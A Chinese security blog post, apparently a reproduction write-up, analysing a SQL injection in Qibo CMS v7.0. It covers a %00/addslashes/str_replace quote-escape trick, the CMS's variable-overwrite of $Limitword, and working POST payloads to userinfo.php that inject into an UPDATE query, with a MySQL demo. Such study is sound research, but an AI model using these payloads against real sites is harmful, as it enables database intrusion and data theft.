<!DOCTYPE html>
<html lang="en">
	<head>
		<meta charset="utf-8">
		<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
		<meta name="viewport" content="width=device-width, initial-scale=1">
		 
			
  
    <meta name="twitter:card" content="summary"/>
    
      <meta name="twitter:image" content="https://yang1k.github.io/images/avatar.png" />
    
  
  
  <meta name="twitter:title" content="齐博sql注入复现"/>
  <meta name="twitter:description" content=".
"/>
  
  
  
  
    <meta name="twitter:creator" content="@Yang1k"/>
  



		
		<meta name="author" content="Yang1k">
		<meta name="description" content="Site Description">
		<meta name="generator" content="Hugo 0.56.0" />
		<title>齐博sql注入复现 &middot; Yang1k</title>
		<link rel="shortcut icon" href="https://yang1k.github.io/images/favicon.ico">
		<link rel="stylesheet" href="https://yang1k.github.io/css/style.css">
		<link rel="stylesheet" href="https://yang1k.github.io/css/highlight.css">

		
		<link rel="stylesheet" href="https://yang1k.github.io/css/font-awesome.min.css">
		

		
		<link href="https://yang1k.github.io/index.xml" rel="alternate" type="application/rss+xml" title="Yang1k" />
		

		
	</head>

    <body>
       <nav class="main-nav">
	
	
		<a href='https://yang1k.github.io/'> <span class="arrow">←</span>Home</a>
	
	<a href='https://yang1k.github.io/post'>Archive</a>
	<a href='https://yang1k.github.io/tags'>Tags</a>
	<a href='https://yang1k.github.io/about'>About</a>

	

	
	<a class="" href="https://yang1k.github.io/index.xml">RSS</a>
	
</nav>


        <section id="wrapper" class="post">
            <article>
                <header>
                    <h1>
                        齐博sql注入复现
                    </h1>
                    <h2 class="headline">
                    Jun 6, 2018 09:54
                    · 313 words
                    · 2 minute read
                      <span class="tags">
                      
                      
                          
                              <a href="https://yang1k.github.io/tags/%E6%B8%97%E9%80%8F">渗透</a>
                          
                      
                      
                      </span>
                    </h2>
                </header>
                
                  
                    <div id="toc">
                      <nav id="TableOfContents">
<ul>
<li>
<ul>
<li><a href="#知识点">知识点</a></li>
<li><a href="#先走一遍利用流程">先走一遍利用流程</a></li>
<li><a href="#原理分析">原理分析</a>
<ul>
<li><a href="#单引号逃逸小手法">单引号逃逸小手法</a></li>
<li><a href="#齐博源码分析">齐博源码分析</a></li>
<li><a href="#update实验">update实验</a></li>
</ul></li>
</ul></li>
</ul>
</nav>
                    </div>
                  
                
                <section id="post-body">
                    <p>.
<!-- more --></p>

<h2 id="知识点">知识点</h2>

<ul>
<li>addslashes将%00转义为\0</li>
<li>str_replace函数参数可控。</li>
<li>单引号逃逸小手法</li>
<li>update注入</li>
</ul>

<p>复现版本
- 齐博v7.0</p>

<h2 id="先走一遍利用流程">先走一遍利用流程</h2>

<p>1.注册用户
2.修改信息
3.查看注入信息</p>

<p>1.注册用户
<img src="1.png" alt="1" /></p>

<p>记住这里的uid，后面要用到。
2.修改信息</p>

<p><img src="2.png" alt="2" />
这里的几个参数需要注意一下。
3.查看信息</p>

<p><img src="3.png" alt="3" />
在这里我们已经可以看到我们注出的信息了。</p>

<h2 id="原理分析">原理分析</h2>

<h3 id="单引号逃逸小手法">单引号逃逸小手法</h3>

<p>看一段代码</p>

<pre><code>&lt;?php
@$a = $_GET['a'];
@$b = $_GET['b'];

$a = addslashes($a);
$b = addslashes($b);
$c = str_replace($a,'', $b); //$c = str_replace('0','', $b);

echo $a.&quot;&lt;br&gt;&quot;;
echo $b.&quot;&lt;br&gt;&quot;;
echo $c.&quot;&lt;br&gt;&quot;;
?&gt;
</code></pre>

<p>url为<code>http://127.0.0.1/45.php?a=0&amp;b=%00'</code></p>

<p>输出结果</p>

<pre><code>0
\0\'
\\'
</code></pre>

<p>由输出结果可以得到我们可以利用<code>\\'</code>的方式，来使单引号逃逸。</p>

<p>这里是因为addslashes函数对%00转义为\0,然后再利用str_replace函数，将0替换为空，这样就达到了目的。</p>

<p>知道了这种逃逸的手法，再来看齐博的这个注入。</p>

<h3 id="齐博源码分析">齐博源码分析</h3>

<p>/member/userinfo.php 第108-110行</p>

<pre><code>		$truename=replace_bad_word($truename);
		$introduce=replace_bad_word($introduce);
		$address=replace_bad_word($address);
</code></pre>

<p>继续跟进这个replace_bad_word函数到/inc/function.inc.php的第375-383行</p>

<pre><code>/*过滤不健康的字*/
function replace_bad_word($str){
	global $Limitword;
	@include_once(ROOT_PATH.&quot;data/limitword.php&quot;);
	foreach( $Limitword AS $old=&gt;$new){
		strlen($old)&gt;2 &amp;&amp; $str=str_replace($old,trim($new),$str); //trim函数就是将字符两侧的空格去除
	}
	return $str;
}

</code></pre>

<p>这个函数就是将传入的\$str变量中的非法字符做替换，替换的内容来自于limitword文件。</p>

<p>再看一下limitword.php的内容</p>

<pre><code>&lt;?php 
$Limitword['造反']='造**';
$Limitword['法轮功']='法**功';

</code></pre>

<p>从这里看 \$Limitword数组并没有初始值。而且在replace_bad_word函数的定义里，声明了\$Limitword为全局变量。</p>

<p>于是可以尝试构造一个$Limitword值，我们可控的参数一般就是GET或者POST，在\inc\common.inc.php的42-49行是齐博处理传参的地方。代码如下</p>

<pre><code>foreach($_COOKIE AS $_key=&gt;$_value){
	unset($$_key);
}
foreach($_POST AS $_key=&gt;$_value){
	!ereg(&quot;^\_[A-Z]+&quot;,$_key) &amp;&amp; $$_key=$_POST[$_key];
}
foreach($_GET AS $_key=&gt;$_value){
	!ereg(&quot;^\_[A-Z]+&quot;,$_key) &amp;&amp; $$_key=$_GET[$_key];
}
</code></pre>

<p>看到这里，就很清晰了。可以通过构造一个GET或者POST参数来构造一个$Limitword的值。</p>

<p>这时再回头看replace_bad_word函数中str_replace函数的使用，就会发现三个参数都是可控的。</p>

<p>这时就可以使用最前面介绍的单引号逃逸的手法了。</p>

<p>但是齐博有一个过滤特殊字符的函数filtrate()</p>

<pre><code>		$truename=filtrate($truename);
		$idcard=filtrate($idcard);
		$telephone=filtrate($telephone);
		$address=filtrate($address);
		$introduce=filtrate($introduce);
		$homepage=filtrate($homepage);
</code></pre>

<pre><code>/**
*过滤安全字符
**/
function filtrate($msg){
	//$msg = str_replace('&amp;','&amp;amp;',$msg);
	//$msg = str_replace(' ','&amp;nbsp;',$msg);
	$msg = str_replace('&quot;','&amp;quot;',$msg);
	$msg = str_replace(&quot;'&quot;,'&amp;#39;',$msg);
	$msg = str_replace(&quot;&lt;&quot;,&quot;&amp;lt;&quot;,$msg);
	$msg = str_replace(&quot;&gt;&quot;,&quot;&amp;gt;&quot;,$msg);
	$msg = str_replace(&quot;\t&quot;,&quot;   &amp;nbsp;  &amp;nbsp;&quot;,$msg);
	//$msg = str_replace(&quot;\r&quot;,&quot;&quot;,$msg);
	$msg = str_replace(&quot;   &quot;,&quot; &amp;nbsp; &quot;,$msg);
	return $msg;
}
</code></pre>

<p>这个函数限制了我们传入单引号，所以select注入是行不通了，但是update却可以。</p>

<p>简单看一下update注入的利用</p>

<pre><code>update yang set name='1',password='1' where id=1;
update yang set name='1\',password=',password=(select version())#;1' where id=1;
</code></pre>

<p>就是这样将注的数据更新到我们可以查看的地方，就达到了注数据的目的。</p>

<p>更改用户数据的代码在/member/userinfo.php的</p>

<p>构造payload如下</p>

<pre><code>http://127.0.0.1/cms/qibo_gbk/member/userinfo.php?job=edit&amp;step=2

POST数据
truename=xxxx%0000&amp;Limitword[000]=&amp;email=1213@qq.com&amp;old_password=123456&amp;provinceid=
</code></pre>

<p><img src="4.png" alt="4" />
看到报错单引号已经转义。继续构造</p>

<pre><code>http://127.0.0.1/cms/qibo_gbk/member/userinfo.php?job=edit&amp;step=2

POST数据
truename=xxxx%0000&amp;Limitword[000]=&amp;email=1213@qq.com&amp;old_password=123456&amp;provinceid=,address=(select database()) where uid=2%23
</code></pre>

<p>然后就可以到个人信息页面查看结果。</p>

<h3 id="update实验">update实验</h3>

<pre><code>mysql&gt; select * from yang;
+------+------+----------+
| id   | name | password |
+------+------+----------+
|    1 | yang | yang     |
+------+------+----------+
1 row in set (0.06 sec)
mysql&gt; update yang set name='1',password='1' where id=1;
Query OK, 1 row affected (0.00 sec)
Rows matched: 1  Changed: 1  Warnings: 0
mysql&gt; select * from yang;
+------+------+----------+
| id   | name | password |
+------+------+----------+
|    1 | 1    | 1        |
+------+------+----------+
mysql&gt; update yang set name='1\',password=',password=(select version())#;1' where id=1;
Query OK, 1 row affected (0.00 sec)
Rows matched: 1  Changed: 1  Warnings: 0
mysql&gt; select * from yang;
+------+--------------+----------+
| id   | name         | password |
+------+--------------+----------+
|    1 | 1',password= | 5.5.53   |
+------+--------------+----------+
1 row in set (0.00 sec)

</code></pre>

<blockquote>
<p><a href="https://bugs.leavesongs.com/php/%E9%BD%90%E5%8D%9A%E6%95%B4%E7%AB%99-%E5%9C%B0%E6%96%B9%E9%97%A8%E6%88%B7sql%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E/">链接</a></p>
</blockquote>
                </section>
            </article>

            
                <a class="twitter" href="https://twitter.com/intent/tweet?text=https%3a%2f%2fyang1k.github.io%2fpost%2f4%25E9%25BD%2590%25E5%258D%259Asql%25E6%25B3%25A8%25E5%2585%25A5%2f - %e9%bd%90%e5%8d%9asql%e6%b3%a8%e5%85%a5%e5%a4%8d%e7%8e%b0 "><span class="icon-twitter"> tweet</span></a>

<a class="facebook" href="#" onclick="
    window.open(
      'https://www.facebook.com/sharer/sharer.php?u='+encodeURIComponent(location.href),
      'facebook-share-dialog',
      'width=626,height=436');
    return false;"><span class="icon-facebook-rect"> Share</span>
</a>

            

            
                <div id="disqus_thread"></div>
<script type="text/javascript">
    var disqus_shortname = 'your_disqus_short_name'; 

     
    (function() {
        var dsq = document.createElement('script'); dsq.type = 'text/javascript'; dsq.async = true;
        dsq.src = '//' + disqus_shortname + '.disqus.com/embed.js';
        (document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(dsq);
    })();
</script>
<noscript>Please enable JavaScript to view the <a href="https://disqus.com/?ref_noscript">comments powered by Disqus.</a></noscript>
</div>

            

            

            <footer id="footer">
    
    <p class="small">
    
       © Copyright 2020 <i class="fa fa-heart" aria-hidden="true"></i> Yang1k
    
    </p>
    <p class="small">
        Powered by <a href="http://www.gohugo.io/">Hugo</a> Theme By <a href="https://github.com/nodejh/hugo-theme-cactus-plus">nodejh</a>
    </p>
</footer>

        </section>

        <script src="https://yang1k.github.io/js/jquery-3.3.1.min.js"></script>
<script src="https://yang1k.github.io/js/main.js"></script>
<script src="https://yang1k.github.io/js/highlight.min.js"></script>
<script>hljs.initHighlightingOnLoad();</script>




  
<script type="application/javascript">
var doNotTrack = false;
if (!doNotTrack) {
	(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
	(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
	m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
	})(window,document,'script','https://www.google-analytics.com/analytics.js','ga');
	ga('create', 'your_google_analytics_id', 'auto');
	
	ga('send', 'pageview');
}
</script>





    </body>
</html>
